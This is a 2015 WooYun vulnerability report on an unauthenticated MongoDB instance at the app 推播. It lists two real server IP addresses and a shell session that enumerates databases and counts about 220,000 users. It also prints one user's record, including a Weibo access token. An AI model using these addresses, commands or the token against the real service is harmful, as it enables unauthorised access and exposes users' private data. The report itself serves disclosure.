当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-092235

漏洞标题:推播mongodb未授权访问

相关厂商:推播

漏洞作者: 接盘侠

提交时间:2015-01-19 10:41

修复时间:2015-03-05 10:42

公开时间:2015-03-05 10:42

漏洞类型:未授权访问/权限绕过

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-19: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-03-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

mongodb未授权访问,20w用户信息泄漏。

详细说明:

118.192.69.205:28017
118.192.69.204:28017

mongo 118.192.69.205
> show dbs
admin             (empty)
butter            0.203GB
clock_bugtracher  (empty)
clock_bugtracker  0.203GB
kfc1007           5.951GB
local             (empty)
test              (empty)
zombie            0.203GB
> db.user.find().limit(1).pretty()
{
	"_id" : ObjectId("5195ed8a34b3d012352a68d8"),
	"account" : "weibo_3373253644",
	"avatar" : "http://tuibo.qiniudn.com/bb1e78328d5f41c5894d685e704f8dde.jpg",
	"client" : "ios",
	"followed" : 8,
	"followed_by" : 6,
	"maitaed_by" : 4,
	"message" : {
		"followed_by" : 1,
		"global_old" : 68,
		"person" : 0,
		"pushed_by" : 5,
		"pushed_by_ts" : NumberLong(1400676552),
		"reply_by" : 1,
		"reply_by_ts" : NumberLong(1400923537),
		"system" : 0,
		"system_ts" : 1374838772.499371
	},
	"new_messages" : 30,
	"nickname" : "赤脚大怪",
	"options" : {
		"push_for_follow" : true,
		"push_for_push" : true,
		"push_for_reply" : true,
		"push_for_system" : true,
		"sync_for_weibo" : true
	},
	"others" : {
		"background" : "http://tuibo.qiniudn.com/20351667c94e4bd6925843f04d11186d.jpg",
		"large_avatar" : "http://tuibo.qiniudn.com//30299d49f4ac4d1dab73765ba06c9d2e.jpg"
	},
	"published" : 11,
	"pushed" : 44,
	"pushed_by" : 28,
	"read_mark_ts" : {
		"followed_by" : 1373339501.393544,
		"pushed_by" : 1378267308.834958,
		"reply_by" : 1374838326.28418,
		"system" : 1378267287.80178
	},
	"register_time" : 1368780170.967144,
	"thirdpart_info" : {
		"weibo" : {
			"token" : "2.00q3pRgDHOrzQD3c57de3709riYiQB",
			"user_account" : "3373253644",
			"expires" : "1384110002.766556",
			"user_nickname" : "赤脚大怪"
		}
	},
	"update_time" : NumberLong(1403579370),
	"user_description" : "每个人,都是生活发现者。"
}
> db.user.find().count()
224187


connecting to: 118.192.69.204/test
> show dbs
admin      (empty)
corax_dev  5.951GB
local      (empty)
zombie     0.203GB
> use corax_dev
switched to db corax_dev
> show collections
apns_token
banner
broadcast_msg
category
cron
day_push
follow
fusion
jump
login_account
maita
person_message
person_message_log
push
reply_message
session
sysmessage
system.indexes
system.users
system_message
system_message_global
temperature
topic
topic_comment
topic_comment_report
topic_report
user
users
weibo_bind_friends
weibo_mid
weibo_uid
> db.user.find().count()
238871


漏洞证明:

直接访问

修复方案:

授权

版权声明:转载请注明来源 接盘侠@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝